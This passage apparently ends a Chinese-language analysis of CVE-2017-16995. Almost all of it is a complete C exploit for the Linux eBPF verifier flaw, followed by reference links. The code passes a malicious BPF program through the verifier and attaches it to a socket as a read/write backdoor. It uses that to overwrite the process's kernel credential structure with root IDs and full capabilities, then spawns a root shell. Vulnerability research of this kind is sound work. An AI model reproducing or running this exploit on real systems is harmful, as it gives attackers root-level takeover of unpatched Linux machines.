.dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0 }) #define BPF_ST_MEM(SIZE, DST, OFF, IMM) \ ((struct bpf_insn) { \ .code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \ .dst_reg = DST, \ .src_reg = 0, \ .off = OFF, \ .imm = IMM }) #define BPF_JMP_IMM(OP, DST, IMM, OFF) \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = OFF, \ .imm = IMM }) #define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \ ((struct bpf_insn) { \ .code = CODE, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = IMM }) #define BPF_EXIT_INSN() \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_EXIT, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = 0 }) #define BPF_DISABLE_VERIFIER() \ BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF), /* r2 = (u32)0xFFFFFFFF */ \ BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2), /* if (r2 == -1) { */ \ BPF_MOV64_IMM(BPF_REG_0, 0), /* exit(0); */ \ BPF_EXIT_INSN() /* } */ \ #define BPF_MAP_GET(idx, dst) \ BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), /* r1 = r9 */ \ BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), /* r2 = fp */ \ BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), /* r2 = fp - 4 */ \ BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx), /* *(u32 *)(fp - 4) = idx */ \ BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \ BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), /* if (r0 == 0) */ \ BPF_EXIT_INSN(), /* exit(0); */ \ BPF_LDX_MEM(BPF_DW, (dst), BPF_REG_0, 0) /* r_dst = *(u64 *)(r0) */ static int load_prog() { struct bpf_insn prog[] = { BPF_DISABLE_VERIFIER(), BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_1, -16), /* *(fp - 16) = r1 */ BPF_LD_MAP_FD(BPF_REG_9, mapfd), BPF_MAP_GET(0, BPF_REG_6), /* r6 = op */ BPF_MAP_GET(1, BPF_REG_7), /* r7 = address */ BPF_MAP_GET(2, BPF_REG_8), /* r8 = value */ /* store map slot address in r2 */ BPF_MOV64_REG(BPF_REG_2, BPF_REG_0), /* r2 = r0 */ BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = 0 for exit(0) */ BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 0, 2), /* if (op == 0) */ /* get fp */ BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_10, 0), BPF_EXIT_INSN(), BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 1, 3), /* else if (op == 1) */ /* get skbuff */ BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_10, -16), BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0), BPF_EXIT_INSN(), BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 2, 3), /* else if (op == 2) */ /* read */ BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_7, 0), BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0), BPF_EXIT_INSN(), /* else */ /* write */ BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), BPF_EXIT_INSN(), }; return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog), "GPL", 0); } void info(const char *fmt, ...) { va_list args; va_start(args, fmt); fprintf(stdout, "[.] "); vfprintf(stdout, fmt, args); va_end(args); } void msg(const char *fmt, ...) { va_list args; va_start(args, fmt); fprintf(stdout, "[*] "); vfprintf(stdout, fmt, args); va_end(args); } void redact(const char *fmt, ...) { va_list args; va_start(args, fmt); if(doredact) { fprintf(stdout, "[!] ( ( R E D A C T E D ) )\n"); return; } fprintf(stdout, "[*] "); vfprintf(stdout, fmt, args); va_end(args); } void fail(const char *fmt, ...) { va_list args; va_start(args, fmt); fprintf(stdout, "[!] "); vfprintf(stdout, fmt, args); va_end(args); exit(1); } void initialize() { info("\n"); info("t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)\n"); info("\n"); info(" ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **\n"); info("\n"); redact("creating bpf map\n"); mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3, 0); if (mapfd < 0) { fail("failed to create bpf map: '%s'\n", strerror(errno)); } redact("sneaking evil bpf past the verifier\n"); progfd = load_prog(); if (progfd < 0) { if (errno == EACCES) { msg("log:\n%s", bpf_log_buf); } fail("failed to load prog '%s'\n", strerror(errno)); } redact("creating socketpair()\n"); if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) { fail("failed to create socket pair '%s'\n", strerror(errno)); } redact("attaching bpf backdoor to socket\n"); if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0) { fail("setsockopt '%s'\n", strerror(errno)); } } static void writemsg() { ssize_t n = write(sockets[0], buffer, sizeof(buffer)); if (n < 0) { perror("write"); return; } if (n != sizeof(buffer)) { fprintf(stderr, "short write: %d\n", n); } } static void update_elem(int key, unsigned long value) { if (bpf_update_elem(mapfd, &key, &value, 0)) { fail("bpf_update_elem failed '%s'\n", strerror(errno)); } } static unsigned long get_value(int key) { unsigned long value; if (bpf_lookup_elem(mapfd, &key, &value)) { fail("bpf_lookup_elem failed '%s'\n", strerror(errno)); } return value; } static unsigned long sendcmd(unsigned long op, unsigned long addr, unsigned long value) { update_elem(0, op); update_elem(1, addr); update_elem(2, value); writemsg(); return get_value(2); } unsigned long get_skbuff() { return sendcmd(1, 0, 0); } unsigned long get_fp() { return sendcmd(0, 0, 0); } unsigned long read64(unsigned long addr) { return sendcmd(2, addr, 0); } void write64(unsigned long addr, unsigned long val) { (void)sendcmd(3, addr, val); } static unsigned long find_sk_rcvtimeo() { uid_t uid = getuid(); unsigned long skbuff = get_skbuff(); /* * struct sk_buff { * [...24 byte offset...] * struct sock *sk; * }; * */ unsigned long addr = read64(skbuff + 24); msg("Leaking sock struct from %llx\n", addr); /* * scan forward for expected sk_rcvtimeo value. * * struct sock { * [...] * long sk_rcvtimeo; * }; */ for (int i = 0; i < 100; i++, addr += 8) { if(read64(addr) == 0x7FFFFFFFFFFFFFFF) { /*if(read64(addr - 24) != uid) { continue; }*/ msg("found sock->sk_rcvtimeo at offset %d\n", i * 8); return addr; } } fail("failed to find sk_rcvtimeo.\n"); } static unsigned long find_cred() { /* * struct sock { * [...] * const struct cred *sk_peer_cred; * long sk_rcvtimeo; * }; */ long result = read64(find_sk_rcvtimeo() - 8); msg("found sock->sk_peer_cred\n"); return result; } static void hammer_cred(unsigned long addr) { msg("hammering cred structure at %llx\n", addr); #define w64(w) { write64(addr, (w)); addr += 8; } unsigned long val = read64(addr) & 0xFFFFFFFFUL; w64(val); w64(0); w64(0); w64(0); w64(0); w64(0xFFFFFFFFFFFFFFFF); w64(0xFFFFFFFFFFFFFFFF); w64(0xFFFFFFFFFFFFFFFF); #undef w64 } int main(int argc, char **argv) { initialize(); hammer_cred(find_cred()); msg("credentials patched, launching shell...\n"); if(execl("/bin/sh", "/bin/sh", NULL)) { fail("exec %s\n", strerror(errno)); } } ``` ## 参考链接 [1]https://dangokyo.me/2018/05/24/analysis-on-cve-2017-16995/ [2]https://security.tencent.com/index.php/blog/msg/124 [3]https://bbs.pediy.com/thread-249033.htm [4]https://www.cnblogs.com/rebeyond/p/8921307.html